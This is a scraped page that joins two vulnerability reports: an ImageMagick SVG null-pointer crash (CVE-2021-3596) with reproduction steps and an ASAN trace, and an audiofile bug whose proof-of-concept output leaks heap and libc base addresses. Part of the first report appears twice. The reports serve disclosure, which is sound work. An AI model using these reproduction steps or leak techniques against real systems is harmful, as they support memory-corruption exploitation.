For example, to facilitate the reproducation,

    fallocate -l size_of_the_tmp_folder /tmp/test.img
    

2, Run:

    magick convert poc ./test.ps
    

seg-svg3621.zip (unzip first)

Here is the trace reported by ASAN:

    ASAN:SIGSEGV
    =================================================================
    ==112350==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000009fec8c bp 0x62700001f900 sp 0x7ffd383e31c0 T0)
        #0 0x9fec8b in ReadSVGImage ../coders/svg.c:3621
        #1 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553
        #2 0x8dfbc1 in ReadPESImage ../coders/pes.c:673
        #3 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553
        #4 0xc8ecbc in ReadImages ../MagickCore/constitute.c:943
        #5 0x12bfaef in ConvertImageCommand ../MagickWand/convert.c:607
        #6 0x13fd865 in MagickCommandGenesis ../MagickWand/mogrify.c:191
        #7 0x43992d in MagickMain ../utilities/magick.c:149
        #8 0x7efd17fa982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #9 0x439168 in _start (/mnt/data/playground/ImageMagick/build-asan/utilities/magick+0x439168)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ../coders/svg.c:3621 ReadSVGImage
    ==112350==ABORTING
    

**System Configuration**

    CFLAGS='-I/usr/include/libxml2 -I/usr/include/libpng12  -I/usr/include/openjpeg-2.1 -I/usr/include/freetype2 -I/usr/include/freetype2  -fopenmp -Wall -O0 -g -fsanitize=address  -mtune=broadwell -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16'
    

*   ImageMagick version:  
    Version: ImageMagick 7.0.10-31 Q16 x86\_64 2020-09-22 https://imagemagick.org  
    Copyright: © 1999-2020 ImageMagick Studio LLC  
    License: https://imagemagick.org/script/license.php  
    Features: Cipher DPC HDRI OpenMP(4.0)  
    Delegates (built-in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib
    
*   Environment (Operating system, version and so on):  
    DISTRIB\_ID=Ubuntu  
    DISTRIB\_RELEASE=16.04  
    DISTRIB\_CODENAME=xenial  
    DISTRIB\_DESCRIPTION="Ubuntu 16.04.6 LTS"
    
*   Additional information:
    

Here is the link for the function xmlCreatePushParserCtxt in libxml2,  
which indicates the return value can be NULL if fails.  
https://gitlab.gnome.org/GNOME/libxml2/-/blob/master/parser.c#L12375

CVE-2021-3596: Null Pointer dereference caused by incomplete check of the return value from libxml2 in ReadSVGImage svg.c:3621 · Issue #2624 · ImageMagick/ImageMagick

**Prerequisites**

*   \[Y \] I have written a descriptive issue title
*   \[Y\] I have verified that I am using the latest version of ImageMagick
*   \[Y\] I have searched open and closed issues to ensure it has not already been reported.

**Description**

There is a segmentation fault caused by the NPD in function ReadSVGImage, svg.c:3621 in ImageMagick 7.0.10.  
ImageMagick does not check the nullity of the pointer returned from libxml2 and dereference it directly.  
This directly leads to program crashes and segmentation fault.

**Steps to Reproduce**

1, To ensure reproduce, I use up space in the /tmp folder as a low-level privilege user.  
For example, to facilitate the reproducation,

    fallocate -l size_of_the_tmp_folder /tmp/test.img
    

2, Run:

    magick convert poc ./test.ps
    

seg-svg3621.zip (unzip first)

Here is the trace reported by ASAN:

    ASAN:SIGSEGV
    =================================================================
    ==112350==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000009fec8c bp 0x62700001f900 sp 0x7ffd383e31c0 T0)
        #0 0x9fec8b in ReadSVGImage ../coders/svg.c:3621
        #1 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553
        #2 0x8dfbc1 in ReadPESImage ../coders/pes.c:673
        #3 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553
        #4 0xc8ecbc in ReadImages ../MagickCore/constitute.c:943
        #5 0x12bfaef in ConvertImageCommand ../MagickWand/convert.c:607
        #6 0x13fd865 in MagickCommandGenesis ../MagickWand/mogrify.c:191
        #7 0x43992d in MagickMain ../utilities/magick.c:149
        #8 0x7efd17fa982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #9 0x439168 in _start (/mnt/data/playground/ImageMagick/build-asan/utilities/magick+0x439168)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ../coders/svg.c:3621 ReadSVGImage
    ==112350==ABORTING
    

**System Configuration**

    CFLAGS='-I/usr/include/libxml2 -I/usr/include/libpng12  -I/usr/include/openjpeg-2.1 -I/usr/include/freetype2 -I/usr/include/freetype2  -fopenmp -Wall -O0 -g -fsanitize=address  -mtune=broadwell -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16'
    

*   ImageMagick version:  
    Version: ImageMagick 7.0.10-31 Q16 x86\_64 2020-09-22 https://imagemagick.org  
    Copyright: © 1999-2020 ImageMagick Studio LLC  
    License: https://imagemagick.org/script/license.php  
    Features: Cipher DPC HDRI OpenMP(4.0)  
    Delegates (built-in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib
    
*   Environment (Operating system, version and so on):  
    DISTRIB\_ID=Ubuntu  
    DISTRIB\_RELEASE=16.04  
    DISTRIB\_CODENAME=xenial  
    DISTRIB\_DESCRIPTION="Ubuntu 16.04.6 LTS"
    
*   Additional information:
    

![image](https://user-images.githubusercontent.com/7632714/94231306-50f87b00-ff36-11ea-8d12-3e4aac41d28c.png)

Here is the link for the function xmlCreatePushParserCtxt in libxml2,  
which indicates the return value can be NULL if fails.  
https://gitlab.gnome.org/GNOME/libxml2/-/blob/master/parser.c#L12375  
![image](https://user-images.githubusercontent.com/7632714/94231402-843b0a00-ff36-11ea-9eb0-ed51025e4671.png)

In autofile Audio File Library 0.3.6, there exists one memory leak vulnerability in printfileinfo, in printinfo.c, which allows an attacker to leak sensitive information via a crafted file. The printfileinfo function calls the copyrightstring function to get data, however, it dosn't use zero bytes to truncate the data.

There exists one Memory-leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file.  
To reproduce with the attached poc file:  
poc.zip

Heap address leak:  
./sfinfo ./heapleak\_poc.aiff

Result(See the output of Copyright):

    $ ./sfinfo ./heapleak_poc.aiff
    File Name      ./heapleak_poc.aiff
    File Format    Audio Interchange File Format (aiff)
    Data Format    unknown
    Audio Data     0 bytes begins at offset 0 (0 hex)
                   0 channel, -1 frames
    Sampling Rate  0.00 Hz
    Duration       -inf seconds
    Copyright      C��U
    

Libc address leak:  
./sfinfo ./libleak\_poc.aiff

Result(See the output of Copyright):

    $ ./sfinfo ./libleak_poc.aiff
    File Name      ./libleak_poc.aiff
    File Format    Audio Interchange File Format (aiff)
    Data Format    unknown
    Audio Data     0 bytes begins at offset 0 (0 hex)
                   0 channel, -1 frames
    Sampling Rate  0.00 Hz
    Duration       -inf seconds
    Copyright      Copyright 1991, (d��i
    

**This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert.**

**The poc.py will help you to calculate the address, which is test on Ubuntu 20.04, python2.**

Usage of poc.py:

    $ python2 poc.py heap
    [+] Starting local process './sfinfo': pid 17868
    [*] Process './sfinfo' stopped with exit code 0 (pid 17868)
    [+] heap_leak:0x55b2425d4243
    [+] heap_base:0x55b2425c2000
    $ python2 poc.py lib
    [+] Starting local process './sfinfo': pid 17920
    [*] Process './sfinfo' stopped with exit code 0 (pid 17920)
    [+] lib_leak:0x7f3d0cbf5428
    [+] libaudiofile_base:0x7f3d0cbc9000
    [+] libc_base:0x7f3d0c9bf000
    

The audiofile project is built with:

    $ ./autogen.sh --disable-docs --prefix=OUTPUT_DIR
    $ make
    $ make install
    

**Descrtption of the Vulnerability:**

**First**, the printfileinfo function calls the copyrightstring function to get data:

    //printfileinfo function, printinfo.c
    bool printfileinfo (const char *filename){
    ...
    char *copyright = copyrightstring(file);
    	if (copyright)
    	{
    		printf("Copyright      %s\n", copyright);
    		free(copyright);
    	}
    ...
    }
    

**Second**, the copyrightstring function obtains copyright information from the file and returns a string pointer:

    //copyrightstring function, printinfo.c
    static char *copyrightstring (AFfilehandle file){
    ...
    int datasize = afGetMiscSize(file, miscids[i]);
    		char *data = (char *) malloc(datasize);
    		afReadMisc(file, miscids[i], data, datasize);
    		copyright = data;
    		break;
    ...
    }
    

**However, it forgets to use memset or zero bytes to prevent the Memory-Leak Vulnerability.  
Most importantly, the attacker can control the length of the memcpy when copying the copyright string, in the afReadMisc function, in Miscellaneous.cpp:**

    //afWriteMisc function, Miscellaneous.cpp
    int afWriteMisc (AFfilehandle file, int miscellaneousid, const void *buf, int bytes)
    {
    ...
    	int localsize = std::min(bytes,
    		miscellaneous->size - miscellaneous->position);
    	memcpy((char *) miscellaneous->buffer + miscellaneous->position,
    		buf, localsize);
    	miscellaneous->position += localsize;
    	return localsize;
    ...
    }

Tag

#ubuntu